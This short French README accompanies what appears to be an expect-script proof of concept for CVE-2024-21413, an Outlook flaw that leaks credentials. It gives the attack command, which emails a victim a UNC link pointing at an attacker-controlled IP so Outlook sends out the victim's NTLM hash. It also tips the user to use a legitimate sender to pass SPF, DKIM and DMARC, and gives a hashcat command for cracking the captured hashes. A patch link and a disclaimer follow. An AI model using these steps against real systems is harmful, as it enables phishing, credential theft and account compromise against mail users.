
Microsoft Outlook Information Disclosure Vulnerability (fuite de password hash) - Expect Script POC
Fuite d'identifiants Microsoft Outlook et vulnérabilité d'exécution de code à distance lorsqu'elle est chaînée avec CVE-2023-21716 (via le panneau d'aperçu) CVSS:3.1 9.8 / 8.5
Outlook devrait vous avertir du risque lié à l'ouverture d'un lien externe => mais ce n'est pas le cas !

utilisation : ./cve-2024-21413.sh mx.fqdn port expéditeur destinataire url
./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"
remarques : chmod +x cve-2024-21413.sh
nécessite l'application expect & nécessite une adresse IP d'expéditeur légitime et une adresse email d'expéditeur (pour passer SPF, DKIM, DMARC)




hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O
Solution de contournement/Correctif : [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]
plus d'infos sur moi ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Avertissement : IMPORTANT : Ce script est fourni uniquement à des fins éducatives, de tests éthiques et d'utilisation légale. Ne l'utilisez sur aucun système ou réseau sans autorisation explicite. L'accès non autorisé à des systèmes informatiques et à des réseaux est illégal, et les utilisateurs pris en flagrant délit d'activités non autorisées sont passibles de poursuites judiciaires. L'auteur n'est PAS responsable des dommages causés par une mauvaise utilisation de ce script.